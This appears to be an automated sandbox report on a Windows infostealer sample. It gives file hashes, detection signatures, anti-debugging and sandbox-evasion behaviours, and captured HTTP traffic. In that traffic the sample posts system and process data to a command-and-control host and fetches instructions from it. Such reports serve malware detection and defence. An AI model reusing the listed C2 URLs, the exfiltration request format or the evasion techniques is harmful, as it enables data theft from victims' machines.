Edit tour

Windows Analysis Report
joE9s9sbv0.exe

Overview

General Information

Sample name:joE9s9sbv0.exe
renamed because original name is a hash value
Original sample name:2ce78ac3287a074e14bd8b4af226fd09.exe
Analysis ID:1582827
MD5:2ce78ac3287a074e14bd8b4af226fd09
SHA1:58500a1a439de84a870031062dd51e7cae982987
SHA256:942897e237bc3ab9b597d9258e2541730d2192b957ea21c6242dc373b42dbc8f
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected non-DNS traffic on DNS port
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • joE9s9sbv0.exe (PID: 2788 cmdline: "C:\Users\user\Desktop\joE9s9sbv0.exe" MD5: 2CE78AC3287A074E14BD8B4AF226FD09)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: joE9s9sbv0.exeAvira: detected
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWlAvira URL Cloud: Label: malware
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0Avira URL Cloud: Label: malware
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963Avira URL Cloud: Label: malware
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4Avira URL Cloud: Label: malware
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17Avira URL Cloud: Label: malware
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737Avira URL Cloud: Label: malware
Source: joE9s9sbv0.exeVirustotal: Detection: 48%Perma Link
Source: joE9s9sbv0.exeReversingLabs: Detection: 56%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: joE9s9sbv0.exeJoe Sandbox ML: detected
Source: joE9s9sbv0.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0023A5B0
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0023A7F0
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0023A7F0
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0023A7F0
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0023A7F0
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0023A7F0
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0023A7F0
Source: joE9s9sbv0.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_001D255D
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001D29FF
Source: global trafficTCP traffic: 192.168.2.10:52116 -> 1.1.1.1:53
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 500830Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 34 35 35 31 36 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1Host: home.fiveth5vs.topAccept: */*
Source: global trafficHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_0029A8C0 recvfrom,0_2_0029A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1Host: home.fiveth5vs.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5vs.top
Source: unknownHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 500830Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 34 35 35 31 36 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 14:42:11 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 14:42:13 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17
Source: joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
Source: joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4
Source: joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963
Source: joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: joE9s9sbv0.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: joE9s9sbv0.exe, joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

barindex
Source: joE9s9sbv0.exeStatic PE information: section name:
Source: joE9s9sbv0.exeStatic PE information: section name: .idata
Source: joE9s9sbv0.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001E05B00_2_001E05B0
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001E6FA00_2_001E6FA0
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_0020F1000_2_0020F100
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_0029B1800_2_0029B180
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_0055E0500_2_0055E050
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_0055A0000_2_0055A000
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_002A00E00_2_002A00E0
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_002362100_2_00236210
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_0029C3200_2_0029C320
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_002A04200_2_002A0420
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_005244100_2_00524410
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001DE6200_2_001DE620
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_0029C7700_2_0029C770
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_005367300_2_00536730
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_0023A7F00_2_0023A7F0
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_005547800_2_00554780
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_0028C9000_2_0028C900
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001E49400_2_001E4940
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001DA9600_2_001DA960
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: String function: 00387220 appears 37 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: String function: 002150A0 appears 39 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: String function: 00214FD0 appears 87 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: String function: 003ACBC0 appears 36 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: String function: 00214F40 appears 138 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: String function: 001D73F0 appears 54 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: String function: 001D75A0 appears 244 times
Source: joE9s9sbv0.exeStatic PE information: invalid certificate
Source: joE9s9sbv0.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: joE9s9sbv0.exeStatic PE information: Section: wxhzupjp ZLIB complexity 0.9946275415735047
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_001D255D
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001D29FF
Source: C:\Users\user\Desktop\joE9s9sbv0.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\joE9s9sbv0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: joE9s9sbv0.exeVirustotal: Detection: 48%
Source: joE9s9sbv0.exeReversingLabs: Detection: 56%
Source: joE9s9sbv0.exeString found in binary or memory: +vLpkKJHbLbJDFpxvHB2rdXRZpGvH3MZAAEUBAdxP7f8ARw+j14vcE+M3B3FPE/BdbKMjyl59LHY+pmmQYhUfrnDOc5dhkqOBzTE4mo6mLxuHp/u6MlFTc5uMIya/GvHjxj8JeKPCjivIuGeJctzHO8wjk0cFhMNluY0KtR4fP8qxle1Wvl9ClBQwuGrzblVjzKPIrykk/pmipvJb1/l/jR5Lev8AL/Gv9VD/ADd56Xn+P+ZDRRRQI/q3+GPiHRvEXw1
Source: joE9s9sbv0.exeString found in binary or memory: ykqQT/ADD4t/TK+jf4F8UPgzxU8RZ8LcRxweEzB4D/AFM4/wA7p/VcdCdTCz/tHh3hXN8sc6sISl7BY36xTir1aULq/wDUfhL9C/6S3jpwnT448K/DePFPC9XHY3LYZl/rn4f5JKWMy+cKeMpf2fxFxVlGZpUZzjH20sGqFRv91UnZ2/Niiv1Btv8Agm6tzjHxo2Z/6p1ux0H/AEPQ7+uP8OD+Nv7CX/CnfhX4n+Jg+KY8R/8ACN/2IW0Q+CP7H+2DWP
Source: joE9s9sbv0.exeString found in binary or memory: AH/AEI3g/8A8JnRf/kKj/iej/q1v/m7f/iiaf8AFK7/AKvv/wCcw/8Ayhn8W9Ff2kf8K98Af9CN4P8A/CZ0X/5Co/4V74A/6Ebwf/4TOi//ACFR/wAT0f8AVrf/ADdv/wAUTP8A4pVf9X4/85f/APlEP4t6K/tI/wCFe+AP+hG8H/8AhM6L/wDIVH/CvfAH/QjeD/8AwmdF/wDkKj/iej/q1v8A5u3/AOKJp/xSu/6vv/5zD/8AKGfxb1H/AMs/8/3q/
Source: joE9s9sbv0.exeString found in binary or memory: +v4fgv67aDKfvPt/n8aZRVnQSea/r/P/ABpN59v8/jTKKADzN/4dv61H+8/zincIO/X/AD6elM3n2/z+Naez8/w/4Jp7Pz/D/gljzPlz39fb1+v+famVWab0/Tj9TzT/ADDx/wBM/wDP/wBb60+Ref8AXyD2fn+H/BJqfvPt/n8ag8z2/X/61N3N6/y/wo5F5/18ivZeUvu/4BZ8z7/J/wA85PX6/UGoPNf1/n/jTdzev8v8KZ5ny/f/AB/r6/h0qJwV
Source: joE9s9sbv0.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: joE9s9sbv0.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: cryptsp.dllJump to behavior
